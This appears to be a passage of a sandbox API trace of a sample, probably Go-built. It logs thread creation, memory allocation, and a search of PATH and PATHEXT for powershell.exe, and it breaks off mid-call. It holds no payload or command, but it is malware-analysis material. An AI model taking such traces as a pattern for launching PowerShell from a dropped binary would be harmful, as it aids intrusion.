[0259.173] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0259.217] timeEndPeriod (uPeriod=0x1) returned 0x0 [0259.217] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0260.981] timeBeginPeriod (uPeriod=0x1) returned 0x0 [0260.981] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x2788f680, ulCount=0x10, ulNumEntriesRemoved=0x2788f654, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x2788f680, ulNumEntriesRemoved=0x2788f654) returned 0 [0260.981] NtWaitForSingleObject (Object=0xffffffffffffffff, Alertable=0, Time=0x2788fe70) returned 0x102 [0261.044] timeEndPeriod (uPeriod=0x1) returned 0x0 [0261.044] WaitForMultipleObjects (nCount=0x2, lpHandles=0x2788fdf8*=0x100, bWaitAll=0, dwMilliseconds=0xea60) Thread: id = 3 os_tid = 0xa30 [0056.992] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x27a8fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x27a8fea0*=0x8c) returned 1 [0056.992] VirtualQuery (in: lpAddress=0x27a8fec0, lpBuffer=0x27a8fec0, dwLength=0x30 | out: lpBuffer=0x27a8fec0*(BaseAddress=0x27a8f000, AllocationBase=0x27890000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.992] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x810000 [0056.992] VirtualAlloc (lpAddress=0xc000080000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000080000 [0056.993] VirtualAlloc (lpAddress=0xc000082000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000082000 [0056.993] VirtualAlloc (lpAddress=0xc000084000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000084000 [0056.993] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc000080000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x90 [0056.995] CloseHandle (hObject=0x90) returned 1 [0056.995] SetEvent (hEvent=0x84) returned 1 [0056.995] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x90 [0056.995] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x98 [0056.995] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0057.977] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4625a0, lpParameter=0xc00002ae00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0057.994] CloseHandle (hObject=0xe4) returned 1 [0057.994] ReadFile (in: hFile=0xd4, lpBuffer=0xc00000c140, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000031ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c140*, lpNumberOfBytesRead=0xc000031ddc*=0x21, lpOverlapped=0x0) returned 1 [0092.832] SetEvent (hEvent=0x100) returned 1 [0092.832] ReadFile (in: hFile=0xd4, lpBuffer=0xc00000c2c0, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0xc000031ddc, lpOverlapped=0x0 | out: lpBuffer=0xc00000c2c0*, lpNumberOfBytesRead=0xc000031ddc*=0x2, lpOverlapped=0x0) returned 1 [0092.833] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0093.731] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0094.206] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) Thread: id = 4 os_tid = 0x618 [0056.996] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0xfffffffffffffffe, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x27c8fea0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x27c8fea0*=0x9c) returned 1 [0056.996] VirtualQuery (in: lpAddress=0x27c8fec0, lpBuffer=0x27c8fec0, dwLength=0x30 | out: lpBuffer=0x27c8fec0*(BaseAddress=0x27c8f000, AllocationBase=0x27a90000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0056.997] VirtualAlloc (lpAddress=0xc00003a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00003a000 [0056.997] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa0 [0056.997] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa4 [0056.997] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0057.035] SwitchToThread () returned 1 [0057.035] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0057.314] WaitForSingleObject (hHandle=0xa0, dwMilliseconds=0xffffffff) returned 0x0 [0057.958] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x27c8f5a0, ulCount=0x10, ulNumEntriesRemoved=0x27c8f574, dwMilliseconds=0xe9ff, fAlertable=0 | out: lpCompletionPortEntries=0x27c8f5a0, ulNumEntriesRemoved=0x27c8f574) returned 1 [0094.139] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x27c8f5a0, ulCount=0x10, ulNumEntriesRemoved=0x27c8f574, dwMilliseconds=0x5, fAlertable=0 | out: lpCompletionPortEntries=0x27c8f5a0, ulNumEntriesRemoved=0x27c8f574) returned 1 [0094.139] GetQueuedCompletionStatusEx (in: CompletionPort=0xe0, lpCompletionPortEntries=0x27c8f5a0, ulCount=0x10, ulNumEntriesRemoved=0x27c8f574, dwMilliseconds=0x5, fAlertable=0 | out: lpCompletionPortEntries=0x27c8f5a0, ulNumEntriesRemoved=0x27c8f574) returned 0 [0094.142] SetEvent (hEvent=0x84) returned 1 [0094.142] CancelIoEx (hFile=0xd4, lpOverlapped=0x0) returned 0 [0094.142] CloseHandle (hObject=0xd4) returned 1 [0094.142] CancelIoEx (hFile=0xdc, lpOverlapped=0x0) returned 0 [0094.142] CloseHandle (hObject=0xdc) returned 1 [0094.142] VirtualAlloc (lpAddress=0xc00018a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00018a000 [0094.142] VirtualAlloc (lpAddress=0xc00018c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00018c000 [0094.143] VirtualAlloc (lpAddress=0xc00018e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00018e000 [0094.143] VirtualAlloc (lpAddress=0xc000190000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000190000 [0094.143] VirtualAlloc (lpAddress=0xc000192000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000192000 [0094.143] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xc000192000, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.144] VirtualAlloc (lpAddress=0xc000194000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000194000 [0094.144] VirtualAlloc (lpAddress=0xc000196000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000196000 [0094.144] VirtualAlloc (lpAddress=0xc000198000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc000198000 [0094.145] VirtualAlloc (lpAddress=0xc00019a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00019a000 [0094.145] VirtualAlloc (lpAddress=0xc00019c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00019c000 [0094.145] GetFileAttributesExW (in: lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.146] CreateFileW (lpFileName="powershell.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.146] VirtualAlloc (lpAddress=0xc00019e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc00019e000 [0094.146] GetFileAttributesExW (in: lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.146] CreateFileW (lpFileName="powershell.exe.com" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.146] GetFileAttributesExW (in: lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.146] CreateFileW (lpFileName="powershell.exe.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.147] GetFileAttributesExW (in: lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.147] CreateFileW (lpFileName="powershell.exe.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.147] GetFileAttributesExW (in: lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.147] CreateFileW (lpFileName="powershell.exe.cmd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.147] GetFileAttributesExW (in: lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.147] CreateFileW (lpFileName="powershell.exe.vbs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.147] GetFileAttributesExW (in: lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.147] CreateFileW (lpFileName="powershell.exe.vbe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.147] GetFileAttributesExW (in: lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.147] CreateFileW (lpFileName="powershell.exe.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.147] GetFileAttributesExW (in: lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.148] CreateFileW (lpFileName="powershell.exe.jse" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.148] GetFileAttributesExW (in: lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.148] CreateFileW (lpFileName="powershell.exe.wsf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.148] GetFileAttributesExW (in: lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.148] CreateFileW (lpFileName="powershell.exe.wsh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.148] GetFileAttributesExW (in: lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.148] CreateFileW (lpFileName="powershell.exe.msc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.148] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0xc0001920d0, nSize=0x64 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.148] VirtualAlloc (lpAddress=0xc0001a0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001a0000 [0094.149] VirtualAlloc (lpAddress=0xc0001a2000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001a2000 [0094.149] VirtualAlloc (lpAddress=0xc0001a4000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001a4000 [0094.150] VirtualAlloc (lpAddress=0xc0001a6000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001a6000 [0094.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.150] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe" (normalized: "c:\\windows\\system32\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.150] VirtualAlloc (lpAddress=0xc0001a8000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0xc0001a8000 [0094.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.151] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.com" (normalized: "c:\\windows\\system32\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.151] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.151] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.151] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.151] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.151] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.151] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.152] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.js" (normalized: "c:\\windows\\system32\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0xc0000cb558 | out: lpFileInformation=0xc0000cb558*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0094.152] CreateFileW (lpFileName="C:\\Windows\\system32\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffffffffffff [0094.152] GetFileAttributesExW (in: 